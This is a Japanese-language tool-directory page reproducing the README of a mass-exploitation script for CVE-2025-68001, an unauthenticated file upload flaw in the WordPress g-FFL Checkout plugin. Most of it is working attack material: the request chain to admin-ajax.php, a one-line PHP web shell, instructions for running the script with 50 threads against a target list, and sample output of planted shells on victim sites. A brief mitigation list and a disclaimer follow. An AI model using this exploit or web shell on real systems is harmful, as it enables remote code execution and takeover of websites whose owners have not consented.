Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-68001 — WordPress g-FFL Checkout プラグイン <= 2.1.0 は、優先度の高い任意のファイルアップロードの脆弱性の影響を受けます。 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-68001
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubnxploited/cve-2025-68001

CVE-2025-68001

WordPress g-FFL Checkout プラグイン <= 2.1.0 は、優先度の高い任意のファイルアップロードの脆弱性の影響を受けます。

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-68001

WordPress g-FFL Checkoutプラグイン <= 2.1.0 には、深刻度の高い任意ファイルアップロードの脆弱性があります。

root@kitploit:~
  _      _   _   _  _   _     _   _   _   _    
 / \  / |_ __ ) / \  ) |_ __ |_  (_) / \ / \ /|
 \_ \/  |_   /_ \_/ /_  _)   |_) (_) \_/ \_/  |
                                                 

Telegram CVE Python License


📡 時代の先を行こう。 Telegram で @KNxploited に参加 — 最新のCVE、ゼロデイ、最先端のエクスプロイト研究を提供する、あなただけの情報源です。常に更新されています。万人向けではありません。


📋 概要

CVE-2025-68001 は、garidium が開発した g-FFL Checkout WordPress プラグインで発見された、重大な 未認証の任意ファイルアップロード の脆弱性です。

この脆弱性により、認証されていないリモート攻撃者が ffl_upload_document AJAXアクションを介して、Webシェルを含む任意のファイルをターゲットサーバーにアップロードでき、完全なリモートコード実行(RCE) につながります。


⚙️ 仕組み

エクスプロイトは、正確な多段階の攻撃チェーンに従います:

root@kitploit:~
1. GET /checkout
      ↓
   Extract `checkout_nonce` from inline JavaScript data

2. POST /wp-admin/admin-ajax.php
      action=ffl_upload_document
      nonce=<extracted_nonce>
      document_type=document
      document=<shell.php disguised as image/png>
      ↓
   Server stores the file without extension or MIME validation

3. Parse JSON response
      ↓
   Extract uploaded file path / unique filename

4. Access uploaded shell via HTTP
      ↓
   Remote Code Execution achieved ✔️

プラグインは、以下の特徴を持つAJAXエンドポイント ffl_upload_document を公開しています:

  • 認証チェックなしでファイルアップロードを受け付ける
  • サーバーサイドでのファイルタイプ検証を行わない
  • JSONレスポンスで保存されたファイルパスを返す

🔧 必要条件

実行前にすべての依存関係をインストールしてください:

root@kitploit:~
pip install requests rich
依存関係用途
requestsHTTPリクエストとセッション処理
richターミナルUI、プログレスバー、パネル
threadingマルチスレッドによるターゲット処理

Python 3.8+ が必要です。


📂 ファイル構成

root@kitploit:~
CVE-2025-68001/
├── CVE-2025-68001.py       # Main exploit script
├── shell.php               # Web shell to upload (you provide this)
├── list.txt                # Target URLs (one per line)
└── success_results.txt     # Auto-generated results output

🚀 使い方

ステップ1 — ターゲットを準備する

list.txt ファイルを作成し、各行にターゲットURLを1つ記述します:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

スキームが指定されていない場合、スクリプトは自動的に http:// を先頭に付加します。


ステップ2 — シェルを準備する

PHP Webシェルを同じディレクトリに配置します。最小限のシェルの例:

root@kitploit:~
<?php system($_GET['cmd']); ?>

shell.php という名前で保存します(名前は任意 — 実行時に入力を求められます)。


ステップ3 — エクスプロイトを実行する

root@kitploit:~
python CVE-2025-68001.py

対話式のプロンプトが表示されます:

root@kitploit:~
Enter targets file name (default: list.txt):
> list.txt

Enter shell file name to upload (default: shell.php):
> shell.php

Enter number of threads (default: 50):
> 20

ステップ4 — 結果を確認する

成功したエクスプロイトは自動的に success_results.txt に保存されます:

root@kitploit:~
https://target.com | /wp-content/uploads/ffl/abc123.php | abc123.php | shell.php

各行には以下が含まれます:

  • ターゲットURL
  • サーバー上に保存されたファイルパス
  • サーバーによって割り当てられた一意のファイル名
  • 元のアップロードファイル名

🖥️ スクリプトパラメータリファレンス

プロンプトデフォルト説明
ターゲットファイルlist.txtターゲットURLを含むファイル
シェルファイル

📊 出力例

root@kitploit:~
✔  https://victim.com  — /checkout reachable. Trying exploit...

┌─────────────────────────────────────────────────────┐
│                      Success                        │
│  https://victim.com                                 │
│  Original Name:  shell.php                          │
│  Unique Name:    a7f3c1d9e.php                      │
│  Stored Path:    /wp-content/uploads/ffl/a7f3c1.php │
└─────────────────────────────────────────────────────┘

All targets processed ✔️. Results saved to: success_results.txt

🔍 脆弱なコードパス(技術詳細)

この脆弱性は、権限チェックなしで登録されたプラグインのAJAXハンドラに存在します:

root@kitploit:~
// No authentication or capability check
add_action('wp_ajax_nopriv_ffl_upload_document', 'ffl_upload_document');

function ffl_upload_document() {
    // Nonce verified from /checkout page (publicly accessible)
    // No MIME type validation
    // No extension whitelist/blacklist
    move_uploaded_file($_FILES['document']['tmp_name'], $upload_path);
    wp_send_json_success(['file_path' => $upload_path]);
}

🛡️ 緩和策と修正

サイト運営者または開発者の方は、直ちに以下の対策を講じてください:

  • ✅ 更新:パッチが適用されたバージョン(> 2.1.0)が利用可能な場合は、g-ffl-checkout プラグインを更新する
  • ✅ 無効化:パッチが確認されるまでプラグインを無効化する
  • ✅ 制限:アップロードディレクトリでの実行権限を制限する(例:.htaccess ルール)
  • ✅ 実装:サーバーサイドのファイルタイプ検証と厳格な拡張子ホワイトリストを実装する
  • ✅ 監視:アップロードディレクトリに不審な .php ファイルがないか監視する
  • ✅ WAF有効化:未認証のAJAXファイルアップロードリクエストをブロックするWAFルールを有効にする

⚠️ 免責事項

root@kitploit:~
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL AND AUTHORIZED
SECURITY RESEARCH PURPOSES ONLY.

By using this script, you explicitly agree to the following:

  • You have EXPLICIT written permission from the target system owner.
  • You are operating in a controlled lab or authorized penetration testing engagement.
  • You will NOT use this tool against any system you do not own or have legal
    authorization to test.
  • The author (Nxploited) holds ZERO liability for any damage, data loss,
    legal consequences, or misuse resulting from this tool.

Unauthorized use of this tool against systems without permission is ILLEGAL
and may violate laws including but not limited to:
  — Computer Fraud and Abuse Act (CFAA)
  — EU Directive on Attacks Against Information Systems
  — And equivalent laws in your jurisdiction.

USE RESPONSIBLY. HACK ETHICALLY.

👤 作者

ハンドルNxploited
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Telegram で @KNxploited をフォロー して、最新の脆弱性開示、エクスプロイトリリース、 セキュリティ研究を誰よりも早く受け取りましょう。


Nxploited によって精密に構築 · 教育目的のみ
ツールをダウンロード
フィールド詳細
CVE IDCVE-2025-68001
プラグインg-FFL Checkout (g-ffl-checkout)
影響を受けるバージョンn/a から <= 2.1.0
脆弱性の種類無制限ファイルアップロード
影響リモートコード実行(RCE)
認証不要
CVSS深刻度重大
研究者Nxploited
shell.php
ターゲットにアップロードするPHPシェル
スレッド数50同時実行ワーカー数(最大: 50)